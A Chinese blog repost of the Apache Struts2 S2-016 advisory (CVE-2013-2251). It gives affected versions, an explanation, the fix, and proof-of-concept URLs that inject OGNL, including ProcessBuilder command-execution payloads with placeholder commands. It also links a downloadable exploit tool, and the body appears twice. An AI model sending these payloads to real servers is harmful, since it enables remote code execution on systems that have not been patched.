struts2最新s2-016代码执行漏洞CVE-2013-2251
2013-08-03 22:27
1451 查看
这是一个代码执行漏洞,利用java代码来执行系统命令。
影响版本:Struts 2.0.0 – Struts 2.3.15
漏洞说明:
The Struts 2 DefaultActionMapper supports a method for short-circuit
navigation state changes by prefixing parameters with “action:” or
“redirect:”, followed by a desired navigational target expression. This
mechanism was intended to help with attaching navigational information
to buttons within forms.
In Struts 2 before 2.3.15.1 the information following “action:”,
“redirect:” or “redirectAction:” is not properly sanitized. Since said
information will be evaluated as OGNL expression against the value
stack, this introduces the possibility to inject server side code.
测试POC:
In the Struts Blank App, open following URLs.
Simple Expression – the parameter names are evaluated as OGNL.
http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
Command Execution
%7B%E2%80%98command%E2%80%99,%27%27goes%E2%80%99,%27%27here%E2%80%99%7D%29%29.start]http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘command’,''goes’,''here’})).start()}
%7B%E2%80%98command%E2%80%99,%27%27goes%E2%80%99,%27%27here%E2%80%99%7D%29%29.start]http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘command’,''goes’,''here’})).start()}
%7B%E2%80%98command%E2%80%99,%27%27goes%E2%80%99,%27%27here%E2%80%99%7D%29%29.start]http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘command’,''goes’,''here’})).start()}
解决方法:
DefaultActionMapper was changed to sanitize “action:”-prefixed
information properly. The features involved with
“redirect:”/”redirectAction:”-prefixed parameters were completely
dropped – see also S2-017.
官方说明:http://struts.apache.org/release/2.3.x/docs/s2-016.html
struts2最新s2-016代码执行漏洞exp利用工具下载 K8_Struts2_EXP_0718[K8]
下载地址:
http://pan.baidu.com/share/link?shareid=2765322418&uk=4045637737
影响版本:Struts 2.0.0 – Struts 2.3.15
漏洞说明:
The Struts 2 DefaultActionMapper supports a method for short-circuit
navigation state changes by prefixing parameters with “action:” or
“redirect:”, followed by a desired navigational target expression. This
mechanism was intended to help with attaching navigational information
to buttons within forms.
In Struts 2 before 2.3.15.1 the information following “action:”,
“redirect:” or “redirectAction:” is not properly sanitized. Since said
information will be evaluated as OGNL expression against the value
stack, this introduces the possibility to inject server side code.
测试POC:
In the Struts Blank App, open following URLs.
Simple Expression – the parameter names are evaluated as OGNL.
http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
Command Execution
%7B%E2%80%98command%E2%80%99,%27%27goes%E2%80%99,%27%27here%E2%80%99%7D%29%29.start]http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘command’,''goes’,''here’})).start()}
%7B%E2%80%98command%E2%80%99,%27%27goes%E2%80%99,%27%27here%E2%80%99%7D%29%29.start]http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘command’,''goes’,''here’})).start()}
%7B%E2%80%98command%E2%80%99,%27%27goes%E2%80%99,%27%27here%E2%80%99%7D%29%29.start]http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘command’,''goes’,''here’})).start()}
解决方法:
DefaultActionMapper was changed to sanitize “action:”-prefixed
information properly. The features involved with
“redirect:”/”redirectAction:”-prefixed parameters were completely
dropped – see also S2-017.
官方说明:http://struts.apache.org/release/2.3.x/docs/s2-016.html
struts2最新s2-016代码执行漏洞exp利用工具下载 K8_Struts2_EXP_0718[K8]
下载地址:
http://pan.baidu.com/share/link?shareid=2765322418&uk=4045637737
相关文章推荐
- Struts2(s2-016)远程代码执行漏洞详细代码分析
- Struts2 S2-016,S2-017远程代码执行漏洞解决,修复
- Apache Struts2任意代码执行漏洞(S2-032)检测程序
- struts2 最新漏洞 S2-016、S2-017修补方案
- struts2 最新S2-016-S2-017漏洞通杀struts2所有版本
- CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
- CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
- Struts2 S2 – 032远程代码执行漏洞分析报告
- WordPress 'is_serialized()'远程任意代码执行漏洞(CVE-2013-4338)
- Apache Struts2 includeParams属性远程命令执行漏洞(CVE-2013-1966)
- Struts2 REST 插件 XStream 远程代码执行漏洞 S2-052 复现过程
- Apache Struts2打开重定向/命令执行 CVE-2013-2251
- 【S2-052】Struts2远程命令执行漏洞(CVE-2017-9805)
- 【高危漏洞预警】CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052)
- Struts2 远程执行代码(S2-016) 利用工具
- struts2 最新S2-016-S2-017漏洞通杀struts2所有版本及修复方法
- struts2之高危远程代码执行漏洞,可造成服务器被入侵,下载最新版本进行修复
- Struts2 S2 – 032远程代码执行漏洞分析报告 .
- 漏洞--Struts2远程命令执行S2-016
- struts2之高危远程代码执行漏洞,可造成服务器被入侵,下载最新版本进行修复